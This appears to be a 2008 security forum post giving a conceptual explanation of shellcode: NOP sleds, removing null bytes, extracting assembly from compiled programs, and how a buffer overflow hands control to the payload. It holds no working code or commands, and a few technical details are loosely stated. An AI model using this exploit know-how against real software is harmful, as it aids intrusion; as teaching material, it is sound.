| Author |
Message |
|
| aatk8626 |
 Posted: Fri Jun 06, 2008 2:12 pm |
 |
|
Craftsman
Joined: 02 Nov 2007
Posts: 61
Location: Birmingham Alabama
|
Shellcode gets its name from the traditional sense that when it was first used, the intended purpose was to spawn a remote shell on the victim's machine (UNIX) Modern shellcode is no longer limited to Unix environments, nor does it always spawn a remote shell. Today, there are several variations of shellcode including but not limited to actions such as download and executing, execute a command, spawn process, spawn a shell.
Shellcode typically takes shape with several distinct sections:
The Nopsled is a fundamental part of the shellcode which uses /x90/, the hexadecimal representation of the machine code "no operation".
The actual commands to execute (the true shellcode) is usually made of assembler instructions with all NULL characters removed. This is because C/C++ instructions like str_copy will terminate execution when they come across a NULL character.
Where does the shellcode come from? Well, simply put, the designer writes a small program in a low-level language such as c/c++/asm, then compiles the program. Once compiled, he then takes the program and disassembles it to extract the raw assembly code. The assembly is organized, checked for NULL characters, and then added into the shellcode so that it is executed after the Nopsled.
When the exploit is launched, the buffer overflows, the program's execution then takes place on the Nopsled where it slides through all the No-Op instructions until it hits at the beginning of the shellcode. If everything goes as planned, the vulnerable process will execute the ASM instructions as planned and the exploit succeeds! |
|
|
| Back to top |
  |
|
|
All times are GMT - 9 Hours
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
|
